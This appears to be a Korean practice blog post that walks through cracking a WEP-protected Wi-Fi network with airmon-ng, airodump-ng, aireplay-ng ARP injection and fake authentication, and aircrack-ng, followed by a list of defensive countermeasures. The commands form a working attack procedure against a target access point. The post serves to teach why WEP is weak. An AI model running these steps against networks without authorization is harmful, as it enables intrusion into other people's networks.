WEP 크래킹
우선 무선 랜카드가 모니터(Monitor) 모드를 지원하는지 확인해야한다.
ifconfig
(무선랜 확인)
iwconfig
(무선랜 확인)
airmon-ng
(모니터 모드 지원 여부 확인)
wlan 이나 ath 가 무선 랜을 의미한다
모니터 모드를 시작하자
airmod-ng start wlan0
ifconfig
(mon0 확인)
(mon0 확인)
(mon0 확인)
이제 airodump-ng mon0을 입력하여 주변 AP를 검색하자
항목 |
설명 |
BSSID |
AP MAC 주소 |
PWD |
수신율 |
Beacons |
Beacon Frame Message 카운트 수 |
CH |
채널 번호 |
CIPHER |
인증 방법 |
AUTH |
인증 방식 |
ESSID |
AP의 SSID |
<무선 AP 정보 항목 설명>
공격할 AP의 BSSID와 ch를 확인했으면
Ctrl + C 로 정지하고
airmon-ng stop mon0
airmon-ng start wlan0 7
잘안된다면 airmon-ng --help쳐보자
이제 IV 값을 수집해야한다
약 5000개 마다 다시 반복될 확률이 50%라고했던거같다. 많이 수집해보자
airodump-ng -channel [채널] --bssid [타겟맥주소] -w [저장] mon0
잘안된다면 airodump-ng --help로 도움말을 보자
IV값 수집이 느리다면 ARP 인젝션 공격(Injection Attack)을 통해 단시간 내에 많은 IV 값을 수집할 수 있다.
aireplay-ng -3 -b [타겟맥주소] -h [무선랜카드맥주소] mon0
(오류가 난다면 airmon-ng check 와 airmon-ng check kill 을 입력하고 해보자)
(-3는 ARP 인젠션 공격이다 aireplay --help 참조)
이미 AP와 통신중인 MAC 주소를 이용한 패킷 발생 공격이기 때문에 한대 이상의
스테이션(Station)이 결합돼 있어야 한다.
(ARP 인젠션 공격 모습)
(airodump-ng 터미널을 보면 #Data 값이 엄청 올라가고 있는걸 볼 수 있다.)
또 한가지 방법은 Fake Authentication이다
가짜 인증으로 IV이 발생하게 만든다
aireplay-ng -1 -0 -a [AP맥주소] mon0
(오류가 난다면 airmon-ng check 와 airmon-ng check kill 을 입력하고 해보자)
(Fake Authentication 공격 모습)
이제 키 값을 크랙해보자
충분히 IV 값을 모왔다면 키를 찾았다고 아래와 같이 뜰 것이고 IV값이 모자르면
실패했다고 뜬다.
aircrack-ng wep-??.cap
(키찾기 성공시 화면)
(키 찾기 실패시 화면)
WEP는 조금만 IV값을 수집하면 바로 패스워드를 찾을수있다는걸 실습해봤다
요즘은 WEP를 쓰는 사람은 없을거같지만 혹시라도 사용하고 있다면 바꾸길 바란다..
WEP 키 크래킹에 대한 보안 대책
1. 사용자 제어 정책
-무선 랜 사용과 관련된 조직의 보안 정책 개발
-무선 랜 사용자에 대한 보안 교육
-건물과 무선 랜 장비 사용 장소에 대한 물리적인 접근 제어
-집단 내에 보유한 무선 랜 장비의 목록 작성/관리
-WEP 암호화 사용금지
2. AP 제어 정책
-무선 랜카드와 AP의 보안 패치 적용
-AP 송신 파워 조절
-AP 설치 시 외부와 인접한 장소(벽, 창문 등) 회피
-AP 설치 시 외부에 신호가 노출되지 않게 주변 벽 재질을 RF 감쇠율이 높은 금속으로 사용
-미사용 AP 전원 차단
-AP의 Beacon 패킷(SSID 브로드캐스트) 기능 차단
-AP의 SSID 설정 시 부서명, 회사명, 제품명 등의 사용 금지
-MAC 필터링을 이용해 인가된 사용자만 접근 허용
3. IDPS 제어
-WIDPS 관리자, WIDPS 센서 설치 후 관제와 침입 차단